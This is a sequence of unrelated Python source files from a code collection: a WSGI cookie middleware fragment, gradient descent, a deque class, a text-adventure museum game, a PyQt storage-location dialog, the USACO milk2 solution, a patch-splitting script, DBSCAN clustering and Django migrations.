            response_cookie[self.cookie_key] = saved_id
            response_cookie[self.cookie_key]['path'] = '/'
            response_headers.append(
                ('Set-Cookie',
                 response_cookie[self.cookie_key].OutputString()))
            return start_response(status, response_headers, exc_info)

        return self.app(environ, middleware_start_response)
|
20,746 | 5ef8c16bd1a71a5f37106533d257d836182a9164 | #!/usr/bin/python3
# -*-coding:utf-8-*-
# theta = theta - alpha * cost'(theta)
# theta = theta - alpha * ((1/m)*((hypothesis(theta*x)-y)*x))
import costFunc_linear
import hypothesis_linear as hFunc
def gradient_descent(x, y, theta, alpha, iterations):
    """Batch gradient descent for linear regression.

    Update rule: theta -= (alpha / m) * x.T * (h(x, theta) - y).

    NOTE(review): relies on numpy *matrix* semantics (`x.T`, `*` as matrix
    multiplication) -- presumably x is (m, n) and y / theta are column
    matrices; confirm against hypothesis_linear.hypothesis_func.
    """
    m = len(y)
    for i in range(iterations):
        theta = theta - (alpha/m)*x.T*(hFunc.hypothesis_func(x, theta) - y)
    return theta
|
20,747 | 871e066f4d71c0cc6c2c44fda2bc5329f3dcda91 | import csv
# Print each column index next to its header name for the Sitka weather CSV.
filename = 'sitka_weather_07-2014.csv'
with open(filename) as file_object:
    reader = csv.reader(file_object)
    # The first row of the file is the header; consume it from the reader.
    header_row = next(reader)
    for index, column_header in enumerate(header_row):
        print(index, column_header)
        # print("\nKey: " + str(index))
        # print("Value: " + column_header)
20,748 | 7e2ed6cbdeb0d02c014991205f46dc5c095bfc7a | from Deque import Deque
class Array_Deque(Deque):
    """Double-ended queue backed by a circular, grow-on-demand array.

    Fixes over the original implementation:
      * push_front never updated the back index, so peek_back/pop_back
        could read the wrong slot after a front push;
      * push_back did not wrap its index modulo the capacity, so a
        push_back after the ring wrapped raised IndexError;
      * pop_back decremented the back index below zero, silently
        corrupting subsequent operations via negative indexing.
    The back position is now derived from front + size, which keeps the
    two ends consistent by construction.
    """

    def __init__(self):
        # capacity starts at 1; we will grow on demand.
        self.__capacity = 1
        self.__size = 0
        self.__contents = [None] * self.__capacity
        self.__front = 0

    def __back_index(self):
        """Physical index of the last stored element (valid when size > 0)."""
        return (self.__front + self.__size - 1) % self.__capacity

    def __str__(self):
        if self.__size == 0:
            return '[ ]'
        items = [str(self.__contents[(self.__front + i) % self.__capacity])
                 for i in range(self.__size)]
        return '[ ' + ", ".join(items) + ' ]'

    def __len__(self):
        return self.__size

    def __grow(self):
        """Double capacity, unwrapping the ring so front lands at index 0."""
        old, old_cap = self.__contents, self.__capacity
        self.__capacity = old_cap * 2
        self.__contents = [None] * self.__capacity
        for i in range(self.__size):
            self.__contents[i] = old[(self.__front + i) % old_cap]
        self.__front = 0

    def push_front(self, val):
        if self.__size + 1 > self.__capacity:
            self.__grow()
        self.__front = (self.__front - 1) % self.__capacity
        self.__contents[self.__front] = val
        self.__size += 1

    def pop_front(self):
        if self.__size == 0:
            raise IndexError
        val = self.__contents[self.__front]
        self.__contents[self.__front] = None  # drop the reference
        self.__front = (self.__front + 1) % self.__capacity
        self.__size -= 1
        return val

    def peek_front(self):
        # Matches the original's observable behaviour: None when empty.
        return self.__contents[self.__front] if self.__size else None

    def push_back(self, val):
        if self.__size + 1 > self.__capacity:
            self.__grow()
        self.__size += 1
        self.__contents[self.__back_index()] = val

    def pop_back(self):
        if self.__size == 0:
            raise IndexError
        idx = self.__back_index()
        val = self.__contents[idx]
        self.__contents[idx] = None  # drop the reference
        self.__size -= 1
        return val

    def peek_back(self):
        return self.__contents[self.__back_index()] if self.__size else None
#if __name__ == '__main__':
|
20,749 | c48ac784bc9a0db016cb2519ae007238a59920aa | from command import Command, CommandInterface
class Monitor(Command):
    """Command that streams Insteon messages seen by the PLM."""

    def __init__(self, owning_service, version):
        self.owning_service = owning_service
        # Single optional flag: restrict output to one command number.
        option_spec = {
            '--filter_command': {
                'type': str,
                'dest': 'num',
                'action': 'store',
                'help': 'show only received msgs of this command number',
            }
        }
        self.interface = CommandInterface('monitor', 'Monitor Insteon messages',
                                          version, self, option_spec)

    def execute(self, args):
        """Run the monitor; returns a list of status strings."""
        if not self.owning_service.is_initialized():
            return ['PLM is not initialized']
        plm = self.owning_service.get_plm()
        # Blocks until monitoring ends; args.num may be None (no filter).
        plm.monitor(args.num)
        return ['Monitoring terminated']
|
20,750 | edd89804b959a2251d3646924536a3cb16ee5343 | """
@copyright Copyright 2017 GNSS Sensor Ltd. All right reserved.
@author Sergey Khabarov - sergeykhbr@gmail.com
@brief General thread safe methods.
"""
import sys
def safe_print(content):
    """Write *content* plus a newline to stdout as one write() call,
    so concurrent threads do not interleave text and newline."""
    sys.stdout.write(''.join((content, '\n')))
|
20,751 | 196c8548afa618487144b25acaf55f71c1a03d25 | #My museum game beause I'm tired of my games killing people. :)
import random
class Player(object):
    """The player: a name plus a pocket of collected items."""

    def __init__(self, name):
        self.name = name
        self.pocket = []  # items gathered during play

    def pocket_it(self, item):
        """Add *item* to the player's pocket."""
        self.pocket.append(item)

    def check_pocket(self):
        """List what is currently in the player's pocket.

        Fix: the original lacked `self` and printed the undefined name
        `pocket`, so any call raised an error.
        """
        print(self.pocket)
class Exhibit(object):
    """One museum exhibit: a name and its placard description."""

    def __init__(self, name, description):
        self.name, self.description = name, description
# Global registry of Exhibit objects, filled once at import time.
all_exhibits = []

def create_exhibits():
    """Load '-----'-separated exhibit records into all_exhibits.

    Each record is a name line followed by the description text.
    Returns the populated list.  Fix: the file is now opened with a
    `with` block so it is closed even if parsing fails, and records
    without a description no longer crash with IndexError.
    """
    with open("/home/jessa/lpthw/Museum Game/exhibits.txt", "r") as exhibits_fd:
        exhibits = exhibits_fd.read()
    for item in exhibits.split("-----"):
        name, _, description = item.strip().partition("\n")
        all_exhibits.append(Exhibit(name.strip(), description.strip()))
    return all_exhibits

create_exhibits()
# Maps a space-fact topic to its text; filled once at import time.
strange_spacefacts = {}

def import_strangefacts():
    """Load '-----'-separated 'topic: fact' records into strange_spacefacts.

    Fix: uses a `with` block so the file is closed even on a parse
    error, and records without a ':' no longer crash with IndexError.
    """
    with open("/home/jessa/lpthw/Museum Game/strangefacts.txt", "r") as strangefacts_fd:
        strangefacts = strangefacts_fd.read()
    for item in strangefacts.split("-----"):
        topic, _, fact = item.strip().partition(":")
        strange_spacefacts[topic.strip()] = fact.strip()

import_strangefacts()
class Room(object):
    """Base class for museum rooms.

    enter() loops over explore() until an explore() call sets
    self.exit; the base explore() exits immediately.
    """

    def __init__(self, name, description):
        self.name = name
        self.description = description
        self.exit = False

    def enter(self, player):
        """Keep exploring until explore() flags self.exit."""
        self.exit = False
        while not self.exit:
            self.explore(player)

    def explore(self, player):
        # Default room: nothing to see, leave right away.
        self.exit = True
class Dinosaur(Room):
    """Dinosaur exhibit room (Python 2: print statements, raw_input).

    Offers the skeleton placard, the timeline, and the fossil-digging
    sand mini-game.  Room.enter() calls explore() repeatedly until the
    player types 'exit'.
    """

    def explore(self, player):
        # One prompt/response cycle of the room's menu.
        print(self.description)
        choice = raw_input("What would you like to explore next? Type 'exit' to leave the room or type the name of the place in this room you would like to explore. > ")
        if "exit" == choice:
            print "You have exited the %s. Where would you like to go?" % self.name
            self.exit = True
        elif "look" in choice:
            print(self.description)
        elif "sand" in choice:
            self.sand(player)
        elif "skeleton" in choice:
            print "The skeleton has a placard beside it."
            # NOTE(review): assumes all_exhibits[0] is the skeleton placard
            # (depends on record order in exhibits.txt) -- confirm.
            print all_exhibits[0].description
        elif "timeline" in choice:
            print all_exhibits[1].description

    def sand(self, player):
        # Fossil guessing mini-game; ends when the 'token' is drawn or
        # the artifact pool is exhausted (artifacts are deleted as drawn,
        # so the game is one-shot per run).
        print """There is a tub of sand beneath a big sign with instructions.
A paleontologist is a scientist who studies fossils. Today you are going to
be an amateur paleontologist. A fossil is the remains or impression of a prehistoric
organism preserved in a mold or cast in rock.
In this sand are 5 fossils and 5 regular artifacts.
Can you tell the difference? Type 'True' if the artifact you find is a fossil and
'False' if it is not."""
        # Maps artifact name -> True when it is a fossil.
        artifacts = {
            'rusty bottlecap': False, 'ammonite': True, 'trilobite': True, 'coral': True,
            'gastropod': True, 'vertebrate': True, 'chopstick': False,
            'token': False, 'agate slice': False, 'old bolt': False
        }
        while len(artifacts) > 0:
            # Python 2 only: random.choice() over dict.keys() (a list there).
            random_artifact = random.choice(artifacts.keys())
            print "You go digging and pull up a %s." % random_artifact
            if random_artifact == "token":
                print "You found the token!"
                player.pocket_it(random_artifact)
                break
            else:
                guess = raw_input("Type 'True' if you think it is a fossil. Otherwise type 'False' > ")
                # Compare the typed text against str(True)/str(False).
                if guess == str(artifacts[random_artifact]):
                    print "That is correct!"
                else:
                    print "That is incorrect."
                del artifacts[random_artifact]
        if len(artifacts) == 0:
            print "There are no more items in the sand. You have already played this game."
class SpaceExploration(Room):
    """Space exhibit room (Python 2: print statements, raw_input).

    Offers the star placard, the strange-space-facts dial, and the
    order-the-planets quiz.
    """

    def explore(self, player):
        # One prompt/response cycle; Room.enter() repeats until 'exit'.
        print(self.description)
        choice = raw_input("What would you like to explore?")
        if 'exit' in choice:
            self.exit = True
        elif 'look' in choice:
            print(self.description)
        elif "left" in choice or "star" in choice:
            print "The star has a placard beside it."
            # NOTE(review): assumes all_exhibits[2] is the star placard
            # (depends on record order in exhibits.txt) -- confirm.
            print all_exhibits[2].description
        elif "strange" in choice or "facts" in choice or "straight" in choice:
            print "You rotate through a list of 5 strange facts. Click enter for a new strange fact. Enter 'exit' to leave this game."
            # Facts are deleted as shown, so this game is one-shot per run.
            while len(strange_spacefacts) > 0:
                choice = raw_input("> ")
                if 'exit' in choice:
                    print("Ok, fine, quitter.")
                    break
                # Python 2 only: random.choice() over dict.keys().
                space_fact = random.choice(strange_spacefacts.keys())
                print "Here is your fact about %s." % space_fact
                print strange_spacefacts[space_fact]
                del strange_spacefacts[space_fact]
        elif "planets" in choice or "right" in choice:
            planets = ["Earth", "Jupiter", "Mercury", "Uranus", "Venus", "Saturn", "Neptune", "Mars"]
            planets_in_order = ["Mercury", "Venus", "Earth", "Mars", "Jupiter", "Saturn", "Uranus", "Neptune"]
            player_planets = []
            n = 0  # index of the next planet the player must name
            print "There are 8 planets in our solar system. Here they are in no particular order:", planets
            print "Start by typing the name of the planet closest to the sun and press enter."
            print "If you have gotten the first planet correct you will see 'Correct, what is the next furthest planet from the sun' and it will print your list so far."
            # Loop until the player has named all 8 planets in order.
            while player_planets != planets_in_order:
                guess = raw_input("> ")
                if guess == planets_in_order[n]:
                    player_planets.append(guess)
                    print "Correct! Here is your list so far: %s What is the next furthest planet from the sun?" % player_planets
                    n += 1
                else:
                    print "That is not correct. Try again."
# Module-level construction of the two rooms wired into Game below.
dino_desc = """At the center of the room you see a huge dinosaur skeleton looming over you.
To the left is a sand pit that contains fossils. To the right is a large
timeline. What would you like to explore?"""
dino_room = Dinosaur("Dinosaur Room", dino_desc)
space_desc = """To your left there is what looks like a shooting star painted on the wall, to your right is a flexible mobile
with planets, and straight ahead is a rotating dial with 'Strange Space Facts'. Which would you like to explore first?"""
space_room = SpaceExploration("Space Exploration Room", space_desc)
class Game(object):
    """Owns the player, the room map, and the top-level play loop."""

    def __init__(self, player):
        self.player = player
        self.rooms = {'dino': dino_room, 'space': space_room}
        self.over = False
        self.welcome = """You find yourself standing in a museum. There is a dinosaur exhibit to your left and a space exhibit to your right."""
        self.current_room = None

    def explore(self):
        """Prompt once and return the chosen Room, or None for invalid
        input or 'exit' (which also ends the game)."""
        answer = raw_input("> ")
        if 'left' in answer:
            return self.rooms['dino']
        if 'right' in answer:
            return self.rooms['space']
        if 'exit' in answer:
            self.over = True
            return None
        print("Invalid choice.")
        return None

    def loop(self):
        """Main loop: greet, pick a room, play it, repeat until over."""
        while not self.over:
            if self.current_room is None:
                print(self.welcome)
            chosen = self.explore()
            if chosen is not None:
                self.current_room = chosen
                chosen.enter(self.player)
                self.current_room = None
def main():
    """Entry point: ask for the player's name and run the game loop."""
    player_name = raw_input("What is your name? > ")
    game = Game(Player(player_name))
    game.loop()

# Import guard: only start the game when run directly, not on import.
if __name__ == '__main__':
    main()
|
20,752 | f4b4f2571d8fe0baebe325bad49961458e266601 | from ui.editLocationDialog import Ui_Dialog as ui
from ui.dialog_umbenennen import Ui_Dialog_Umbenennen as renameDialog
from PyQt5 import QtWidgets, Qt
from PyQt5.QtWidgets import QMessageBox, QDialogButtonBox, QDialog
from PyQt5.QtCore import Qt as qt, QObject, pyqtSignal
from db import db
class editLocSubWindow(QtWidgets.QDialog):
    """Dialog for editing storage locations ("Lagerorte").

    Shows a main-location list and, for the selected main location, its
    sub-locations.  Persistence goes through the `db` module.  Each list
    item carries its DB record as a list in Qt.UserRole; index 0 appears
    to be the row id and index 1 the name -- confirm against db module.
    """

    def __init__(self, parent = None):
        super().__init__(parent)
        self.ui = ui()
        self.ui.setupUi(self)
        self.setWindowTitle("Lagerorte bearbeiten")
        self.ui.lbl_SubLocation.clear()
        # Shorthands for the Qt-Designer-generated widgets.
        self.mainlocationlist = self.ui.lw_MainLocation
        self.sublocationlist = self.ui.lw_Sublocation
        self.newmainlocationtextbox = self.ui.le_newMainLocation
        self.buttonwritenewmainlocation = self.ui.pb_addnewMainLocation
        self.buttonwritenewsublocation = self.ui.pb_addnewSubLocation
        self.newsublocationtextbox = self.ui.le_newSubLocation
        # Disabled until a main location is selected.
        self.newsublocationtextbox.setEnabled(False)
        self.initUi()

    def initUi(self):
        """Connect all widget signals and populate the main-location list."""
        self.mainlocationlist.currentItemChanged.connect(self.mainlocationchanged)
        self.sublocationlist.currentItemChanged.connect(self.sublocationchanged)
        self.ui.pb_removeMainLocation.clicked.connect(self.removemainlocation)
        self.ui.pb_removeSubLocation.clicked.connect(self.removesublocation)
        self.newmainlocationtextbox.textChanged.connect(self.enableAddnewMainButton)
        self.newsublocationtextbox.textChanged.connect(self.enableAddnewSubButton)
        self.buttonwritenewmainlocation.clicked.connect(self.writenewmainlocation)
        self.buttonwritenewsublocation.clicked.connect(self.writenewsublocation)
        self.ui.le_newMainLocation.returnPressed.connect(self.writenewmainlocation)
        self.ui.le_newSubLocation.returnPressed.connect(self.writenewsublocation)
        # Both edit buttons share one handler; it dispatches on sender().
        self.ui.pb_editMainLocation.clicked.connect(self.renameLocation)
        self.ui.pb_editSubLocation.clicked.connect(self.renameLocation)
        self.readMainLocationinListWidget()

    def updatesignal(self):
        # Debug stub; not connected anywhere visible in this class.
        print("updatesignal")

    def renameLocation(self):
        """Open the rename dialog for the selected main or sub location.

        Which list is targeted is decided by the clicked button's
        objectName, since both buttons share this slot.
        """
        print(self.sender())
        sender = self.sender().objectName()
        if sender == 'pb_editMainLocation':
            print("renameMain")
            currentitem = self.mainlocationlist.selectedItems()
            location = currentitem[0].data(qt.UserRole)
            self.renDialog = renameWindow('main', location)
            if self.renDialog.exec() == QDialog.Accepted:
                print("ok geklickt")
                self.update()
            else:
                print("Abgebrochen")
        elif sender == 'pb_editSubLocation':
            print("renameSub")
            currentitem = self.sublocationlist.selectedItems()
            location = currentitem[0].data(qt.UserRole)
            self.renDialog = renameWindow('sub', location)
            if self.renDialog.exec() == QDialog.Accepted:
                print("ok geklickt")
                self.updateSubLocationlist()
            else:
                print("Abgebrochen")

    def writenewmainlocation(self):
        """Persist the text-box content as a new main location."""
        newlocation = self.newmainlocationtextbox.text().strip()
        # Reject input that is only whitespace.
        if len(str.replace(newlocation," ","")) > 0:
            if db.addLocation('main', newlocation):
                print("Erfolgreich gespeichert")
                self.update()
            else:
                QMessageBox.critical(self, 'Fehler!',
                                     "Fehler beim schreiben. {location} ist bereits vorhanden! Bitte anderen Namen wählen.".format(location=newlocation),
                                     QMessageBox.Ok)
        else:
            print("Leerzeichen")

    def writenewsublocation(self):
        """Persist the text-box content as a new sub location of the
        currently selected main location."""
        newlocation = self.newsublocationtextbox.text().strip()
        currentmainitem = self.mainlocationlist.selectedItems()
        mainlocation = currentmainitem[0].data(qt.UserRole)
        if len(str.replace(newlocation," ","")) > 0:
            if db.addLocation('sub', newlocation, mainlocation[0]):
                print("Erfolgreich gespeichert")
                self.newsublocationtextbox.clear()
                self.updateSubLocationlist()
            else:
                # No longer implemented since the 'name' field is not
                # unique anymore (translated from the German original).
                QMessageBox.critical(self, 'Fehler!',
                                     "Fehler beim schreiben. {location} ist bereits vorhanden! Bitte anderen Namen wählen.".format(location=newlocation),
                                     QMessageBox.Ok)
        else:
            print("Leerzeichen")

    def enableAddnewMainButton(self):
        # Add button is active only while the text box has content.
        if len(self.newmainlocationtextbox.text()) > 0:
            self.ui.pb_addnewMainLocation.setEnabled(True)
        else:
            self.ui.pb_addnewMainLocation.setEnabled(False)

    def enableAddnewSubButton(self):
        # Same gating for the sub-location add button.
        if len(self.newsublocationtextbox.text()) > 0:
            self.ui.pb_addnewSubLocation.setEnabled(True)
        else:
            self.ui.pb_addnewSubLocation.setEnabled(False)

    def removesublocation(self):
        """Delete the selected sub location after user confirmation."""
        currentitem = self.sublocationlist.selectedItems()
        locationtoremove = currentitem[0].data(qt.UserRole)
        buttonReply = QMessageBox.question(self, 'Löschen!',
                                           "Willst du den Lagerunterort \"{ort}\" wirklich löschen?".format(
                                               ort=locationtoremove[1]),
                                           QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
        if buttonReply == QMessageBox.Yes:
            if db.removeLocation('sub', locationtoremove[0]):
                print('erfolgreich gelöscht')
                self.updateSubLocationlist()
        else:
            pass

    def removemainlocation(self):
        """Delete the selected main location after user confirmation."""
        currentitem = self.mainlocationlist.selectedItems()
        locationtoremove = currentitem[0].data(qt.UserRole)
        buttonReply = QMessageBox.question(self, 'Löschen!',
                                           "Willst du den Lagerort \"{ort}\" wirklich löschen?".format(ort=locationtoremove[1]),
                                           QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
        if buttonReply == QMessageBox.Yes:
            if db.removeLocation('main', locationtoremove[0]):
                print('erfolgreich gelöscht')
                self.update()
        else:
            pass

    def sublocationchanged(self, item):
        # A sub location got selected: enable its remove/edit buttons.
        self.ui.pb_removeSubLocation.setEnabled(True)
        self.ui.pb_editSubLocation.setEnabled(True)
        print('test')

    def mainlocationchanged(self, item):
        """Selection changed in the main list: reload its sub locations
        and (re)enable the per-main-location controls."""
        if item:
            self.sublocationlist.clear()
            self.ui.pb_removeSubLocation.setEnabled(False)
            self.ui.pb_editSubLocation.setEnabled(False)
            self.ui.pb_editMainLocation.setEnabled(True)
            self.ui.pb_removeMainLocation.setEnabled(True)
            self.newsublocationtextbox.setEnabled(True)
            mainLocation = item.data(qt.UserRole)
            sublocations = db.readLocations('sub', mainLocation[0])
            self.ui.lbl_SubLocation.setText(mainLocation[1])
            for e in sublocations:
                self.sublocationlist.addItem(self.makeListItem(e))
        else:
            pass

    def updateSubLocationlist(self):
        """Refresh the sub-location list for the selected main location."""
        self.sublocationlist.clear()
        mainlocation = self.mainlocationlist.selectedItems()[0].data(qt.UserRole)[0]
        sublocations = db.readLocations('sub', mainlocation)
        for e in sublocations:
            self.sublocationlist.addItem(self.makeListItem(e))
        if self.sublocationlist.count() == 0:
            self.ui.pb_removeSubLocation.setEnabled(False)
            self.ui.pb_editSubLocation.setEnabled(False)

    def readMainLocationinListWidget(self):
        """Load all main locations from the DB into the list widget."""
        self.mainlocationlist.clear()
        mainLocation = db.readLocations('main')
        for e in mainLocation:
            self.mainlocationlist.addItem(self.makeListItem(e))

    def makeListItem(self,daten):
        """Build a QListWidgetItem labelled with the record's 'name' and
        carrying all column values as a list in UserRole."""
        data = []
        listItem = Qt.QListWidgetItem()
        listItem.setText(daten['name'])
        for i in daten:
            data.append(daten[i])
        listItem.setData(qt.UserRole, data)
        return listItem

    def update(self, *__args):
        """Full refresh after a main-location change: reload the main
        list, clear the sub list, and reset the buttons."""
        print('update')
        self.newmainlocationtextbox.clear()
        self.readMainLocationinListWidget()
        self.ui.pb_removeSubLocation.setEnabled(False)
        self.ui.pb_editSubLocation.setEnabled(False)
        if self.mainlocationlist.count() == 0:
            self.ui.pb_removeMainLocation.setEnabled(False)
            self.ui.pb_editMainLocation.setEnabled(False)
        self.sublocationlist.clear()
class renameWindow(QtWidgets.QDialog):
    """Rename dialog for a single location record.

    type: 'main' or 'sub'.  data: the UserRole payload of the selected
    list item -- index 0 is the row id; the name sits at index 1 for
    main rows and index 2 for sub rows.
    """

    def __init__(self, type, data, parent = None):
        super().__init__(parent)
        self.type = type
        self.ui = renameDialog()
        self.ui.setupUi(self)
        self.data = data
        self.setWindowTitle("Umbenennen")
        self.initUi()

    def initUi(self):
        """Pre-fill the text box with the record's current name and
        wire the OK button to rename()."""
        if self.type == 'main':
            # Main rows carry the name at index 1.
            currentname = self.data[1]
            self.locationid = self.data[0]
            self.ui.le_locationname.setText(str(currentname))
            print("mainitem")
        elif self.type == 'sub':
            # Sub rows carry the name at index 2.
            currentname = self.data[2]
            self.locationid = self.data[0]
            self.ui.le_locationname.setText(str(currentname))
            print("subitem")
        self.ui.buttonBox.button(QDialogButtonBox.Ok).clicked.connect(self.rename)

    def rename(self):
        """Persist the new name via the db module."""
        newname = self.ui.le_locationname.text()
        if db.renameLocations(self.type, self.locationid, newname):
            print("Erfolgreich umbenannt")
|
20,753 | d81a6a42cce6f8eb48453783fef85b4a24f4b8a0 | """
ID: mail4rp1
LANG: PYTHON3
TASK: milk2
"""
# ***************** NEED TO FIND: *******************
# - The longest time interval at least one cow was milked.
# - The longest time interval (after milking starts) during which no cows were being milked.
# USACO milk2: read milking intervals from milk2.in, then report the
# longest continuously-milked stretch and the longest idle stretch
# (after milking starts) to milk2.out.
with open("milk2.in") as f:
    lines = [line.strip() for line in f.readlines()]
num_cows = int(lines[0])
times = []
for i in range(num_cows):
    times.append(tuple(int(n) for n in lines[i + 1].split(" ")))

# Intervals are half-open [start, end); assumes at least one cow
# (guaranteed by the problem statement).
start = min(t[0] for t in times)
end = max(t[1] for t in times)

# Mark each second that falls inside any interval.  One pass per
# interval instead of scanning every cow for every second, which
# drops the cost from O(span * cows) to O(span + total interval length).
milked = [False] * (end - start)
for s, e in times:
    for second in range(s, e):
        milked[second - start] = True

# Scan once, tracking the current and best run of each kind.
longest_milking = longest_idle = 0
current_milking = current_idle = 0
for is_milked in milked:
    if is_milked:
        current_milking += 1
        if current_milking > longest_milking:
            longest_milking = current_milking
        current_idle = 0
    else:
        current_idle += 1
        if current_idle > longest_idle:
            longest_idle = current_idle
        current_milking = 0

with open("milk2.out", "w") as f:
    f.write(str(longest_milking) + ' ' + str(longest_idle))
    f.write("\n")
# times = [
# (300, 1000), # cow 1
# (700, 1200), # cow 2
# (1500, 2100) # cow 3
# ]
# # returns list of lists of start and end milking times
# def readInput():
# fin = open("milk2.in")
# data = fin.readlines()
# fin.close()
#
# times = []
# for i in range(1,len(data)):
# times.append([int(data[i].split()[0]), int(data[i].split()[1])])
# return times
#
# # returns dictionary of times when milking was active
# def createDict(times):
# # find earliest and latest time
# earliestTime = 1000000
# latestTime = 0
# for time in times:
# if time[0] < earliestTime:
# earliestTime = time[0]
# if time[1] > latestTime:
# latestTime = time[1]
#
# # set up dictionary of milking times
# milkTimes = {}
# for i in range(earliestTime, latestTime):
# milkTimes[i] = False
#
# # fill dictionary based on when milking was active
# for time in times:
# startTime = time[0]
# endTime = time[1]
# for i in range(startTime, endTime):
# milkTimes[i] = True
#
# return milkTimes, earliestTime, latestTime
#
# # returns longest consecutive milking and non-milking times
# def calcTimes(milkTimes, earliestTime, latestTime):
# longestMilkTime = 0
# currentMilkTime = 0
# longestNoMilkTime = 0
# currentNoMilkTime = 0
# for key in range(earliestTime, latestTime):
# if milkTimes[key]:
# currentMilkTime += 1
# if currentMilkTime > longestMilkTime:
# longestMilkTime = currentMilkTime
# currentNoMilkTime = 0
# else:
# currentNoMilkTime += 1
# if currentNoMilkTime > longestNoMilkTime:
# longestNoMilkTime = currentNoMilkTime
# currentMilkTime = 0
#
# return longestMilkTime, longestNoMilkTime
#
# # writes output
# def writeOutput(longestMilkTime, longestNoMilkTime):
# fout = open("milk2.out","w")
# fout.write(str(longestMilkTime) + " " + str(longestNoMilkTime) + "\n")
# fout.close()
#
# times = readInput()
# milkTimes, earliestTime, latestTime = createDict(times)
#longestMilkTime, longestNoMilkTime = calcTimes(milkTimes, earliestTime, latestTime)
# writeOutput(longestMilkTime, longestNoMilkTime)
|
20,754 | 15f100546d18ef85940916f9e5d1f762bdfb0768 | # !/usr/bin/env python3
import sys
# Split jep387-all.patch into core/test/misc patches.  Every 'diff --git'
# header is routed by the rules below; all following lines go to the same
# destination until the next header.
# Fix: files are now opened via `with` so handles are always closed, and
# unused variables / commented-out debug prints were removed.
with open('jep387-all.patch', 'r') as patch_file:
    lines = patch_file.readlines()

files_and_destinations = (
    # <name>, <patch file>
    # order matters: order these patterns in order of speciality
    # match misc unless...
    ('/src', 'misc'),
    # everything in memory/metaspace shall be core unless ...
    ('/src/hotspot/share/memory/metaspace/', 'core'),
    # all these files go to misc
    ('/src/hotspot/share/memory/metaspace/metaspaceDCmd', 'misc'),
    ('/src/hotspot/share/memory/metaspace/metaspaceSizesSnapshot', 'misc'),
    ('/src/hotspot/share/memory/metaspace/printCLDMetaspaceInfoClosure', 'misc'),
    ('/src/hotspot/share/memory/metaspace/printMetaspaceInfoKlassClosure', 'misc'),
    # or to test
    ('/src/hotspot/share/memory/metaspace/metaspace_test', 'test'),
    # core
    ('/src/hotspot/share/memory/metaspace.hpp', 'core'),
    ('/src/hotspot/share/memory/metaspace.cpp', 'core'),
    ('/src/hotspot/share/prims/whitebox', 'test'),
    # anything in test go to test
    ('/test', 'test'),
)

lines_core_patch = []
lines_misc_patch = []
lines_test_patch = []

destination = None
for line in lines:
    if line.startswith('diff --git'):
        # Last matching rule wins (rules go from general to specific).
        for prefix, dest in files_and_destinations:
            if line.startswith('diff --git a' + prefix):
                destination = dest
        if destination is None:
            sys.exit('no rule for: ' + line)
        print(line.strip() + " -> " + destination)
    if destination is not None:
        if destination == 'test':
            lines_test_patch.append(line)
        elif destination == 'core':
            lines_core_patch.append(line)
        elif destination == 'misc':
            lines_misc_patch.append(line)

for out_name, out_lines in (('jep387-core.patch', lines_core_patch),
                            ('jep387-test.patch', lines_test_patch),
                            ('jep387-misc.patch', lines_misc_patch)):
    with open(out_name, 'w') as out_file:
        out_file.writelines(out_lines)

# Sanity check: at most 8 leading header lines may be dropped.
if len(lines_core_patch) + len(lines_test_patch) + len(lines_misc_patch) < len(lines) - 8:
    sys.exit("too few lines")
|
20,755 | 18aabb76fb810c4ed0e6edef60efca4c17e208b0 | from sklearn import metrics
from sklearn.cluster import DBSCAN
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from pandas.plotting import scatter_matrix
if __name__ == '__main__':
    # Cluster the beer dataset (space-separated columns) with DBSCAN on
    # four numeric features, then visualize via a scatter matrix.
    beer = pd.read_csv('data.txt', sep=' ')
    X = beer[["calories", "sodium", "alcohol", "cost"]]
    db = DBSCAN(eps=10, min_samples=2).fit(X)
    # Per-sample cluster labels (-1 marks noise points).
    labels = db.labels_
    # print(labels)
    beer['cluster_db'] = labels
    # NOTE(review): sort_values returns a new frame and the result is
    # discarded here, so this line has no effect -- confirm intent.
    beer.sort_values('cluster_db')
    # print(beer.sort_values('cluster_db'))
    #
    # print(beer.groupby('cluster_db').mean())
    # NOTE(review): a noise label of -1 indexes colors[-1] == 'yellow',
    # aliasing noise with cluster 3 -- verify this is intended.
    colors = np.array(['red', 'green', 'blue', 'yellow'])
    scatter_matrix(X, c=colors[beer.cluster_db], figsize=(10, 10), s=100)
    plt.show()
|
20,756 | b622e8162ed5a4b97c142840b4adde086f0051fe | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# programa1.py - Primeiro programa
"""
Importa o módulo random e sorteia
um número inteiro entre 1 e 100
"""
import random
numero = random.randint(1,100)
escolha = 0
tentativas = 0
while escolha != numero:
escolha = input("Escolha um número entre 1 e 100:")
tentativas += 1
if escolha < numero:
print "O número", escolha ,"é menor que o sorteado."
elif escolha > numero:
print "O número", escolha ,"é maior que o sorteado."
print "Parabéns! Você acertou com", tentativas ," tentativas"
|
20,757 | 84d8695929b7f6eac5ccf3b6b3eeee3b24eaf72e | # Generated by Django 3.1.1 on 2020-09-21 22:25
from django.conf import settings
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 3.1.1): makes Comment.img optional and turns
    # Comment.stars into a nullable float constrained to the 1..5 range.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('myside', '0020_auto_20200922_0659'),
    ]

    operations = [
        migrations.AlterField(
            model_name='comment',
            name='img',
            field=models.ImageField(blank=True, null=True, upload_to='comments/%Y/%m/%d'),
        ),
        migrations.AlterField(
            model_name='comment',
            name='stars',
            field=models.FloatField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)]),
        ),
    ]
|
20,758 | c83c2efe498d9a0a04ed77eb647cf3cd6562b488 | from .folders_widget import FoldersWidget
|
20,759 | 4b272a5a7ca482d0e3f7b267cb484b44608cc096 | # Generated by Django 2.0.7 on 2018-09-18 09:00
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated (Django 2.0.7): sets TaskGroup's human-readable
    # verbose_name to 'Group'; no schema change.

    dependencies = [
        ('scheduyapp', '0008_auto_20180918_1051'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='taskgroup',
            options={'verbose_name': 'Group'},
        ),
    ]
|
20,760 | aa2a00a8135db4e9422c600683d822874a0e344f | # -*- coding: utf-8 -*-
import requests
import uuid
class Megatv():
    """Thin HTTP client for the megatvdnp OTM services: login, streaming
    session management, and EPG/channel/stream lookups.

    Fix: the duplicated channel-list request and login post-processing
